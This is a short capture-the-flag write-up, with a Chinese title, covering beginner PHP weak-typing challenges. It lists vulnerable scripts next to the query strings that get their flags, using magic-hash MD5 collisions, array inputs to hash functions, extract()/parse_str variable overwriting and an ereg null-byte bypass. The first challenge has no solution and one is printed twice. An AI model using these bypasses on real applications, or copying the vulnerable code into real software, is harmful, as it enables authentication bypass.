[wp][入门]刷弱类型题目

 <?php
include "flag.php";
highlight_file(__FILE__);
error_reporting(0);

$a = $_GET['param1'];
$b = $_POST['param2'];
$c = $_GET['param3'];
$d = $_POST['param4'];
if($a!==$b && md5($a)===md5($b) && $c!==$d && sha1($c)===sha1($d)){
    
    echo $flag2;
    die(" xiu_er_!!");
}else{
    
    echo "fail";
}
?> 

2.

<?php
include "flag.php";
highlight_file(__FILE__);
error_reporting(0);
if(isset($_GET['param1'])){
    
    $a = $_GET['param1'];
    switch ($a) {
    
        case $a>=0:
            echo 0;
            break;
        case $a>=10:
            echo $flag3;
            break;
        default:
            echo 2;
            break;
    }
}

?>

？param1=0

 <?php
include "flag.php";
highlight_file(__FILE__);
error_reporting(0);
if(isset($_GET['param1'])){
    
    $a = $_GET['param1'];
    switch ($a) {
    
        case $a>=0:
            echo 0;
            break;
        case $a>=10:
            echo $flag3;
            break;
        default:
            echo 2;
            break;
    }
}

?> 

？param1=0

<?php
include "flag.php";
highlight_file(__FILE__);
error_reporting(0);

$msg = json_decode($_GET['param1']);
if($msg->key == $key){
    
    echo $flag5;
    die(" xiu_er_!!");
}else{
    
    echo "fail";
}
?>

?param1={“key”:0}

 <?php
include "flag.php";
highlight_file(__FILE__);
error_reporting(0);

$s = $_GET['a'];
if(!is_numeric($s)){
    
    if($s+1 === 1000){
    
    die($flag7);
    }
}
?> 

?a=999a

 <?php
include "flag.php";
highlight_file(__FILE__);
error_reporting(0);

$param2 = 'param2';
extract($_GET);
if (isset($param1)) {
    
    if ($param1 == $content){
    
        foreach($arr as $key => $value){
    
            $$key = $value;
        }
        if($param2==='getflag'){
    
            echo $flag9;
        }
    }else{
    
        echo "Oh..nooo";
    }
}
?> 

?param1=1&param2=getflag&content=1

 <?php
include "flag.php";
highlight_file(__FILE__);
error_reporting(0);

if(isset($_GET['password'])){
    
    if(ereg("^[a-zA-Z0-9]+$", $_GET['password'])===false){
    
        echo "must be alphanumeric";
    }elseif (strpos($_GET['password'], '--')!=false) {
    
        die($flag8);
    }else{
    
        echo "Invalid password";
    }
}
?> 

?password=a%00–

<?php
include "flag.php";
highlight_file(__FILE__);
error_reporting(0);

$flag = 'test';
extract($_GET);
if($a!=$b && md5($a)==md5($b) && $c!==$d && sha1($c)===sha1($d)){
    
    if(gettype($a)=='array' && gettype($b)=='array'){
    
        die('Oh..no..');
    }
    if($$flag==='getflag'){
    
        die($flag11);
    }
}
?>

?a=QNKCDZO&b=s878926199a&c[]=3&d[]=4&flag=test&test=getflag

<?php
include "flag.php";
highlight_file(__FILE__);
error_reporting(0);

$paa = 'come_baby';
var_dump($_GET['param']);
parse_str($_GET['param']);
if($arr[1]==="i want" && $paa!=='come_baby' && $a_b==='haha'){
    
    die($flag10);
}else{
    
    echo "Oh..no..";
}
?> 

?param=arr[1]=i want%26paa=1%26a_b=haha